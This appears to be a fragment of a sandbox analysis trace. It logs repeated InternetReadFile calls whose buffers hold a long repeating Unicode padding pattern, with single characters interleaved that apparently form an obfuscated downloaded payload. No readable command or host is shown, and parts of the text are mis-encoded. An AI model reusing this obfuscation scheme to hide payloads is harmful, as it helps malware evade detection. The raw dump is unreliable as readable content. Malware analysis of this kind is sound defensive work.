buffer: ¡³á³šË•ÒŽDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎXмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ+мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳á
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#Ð
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¼á¨²á‡•áŠ¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏmмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእá
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Ž‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏmмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: #мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእ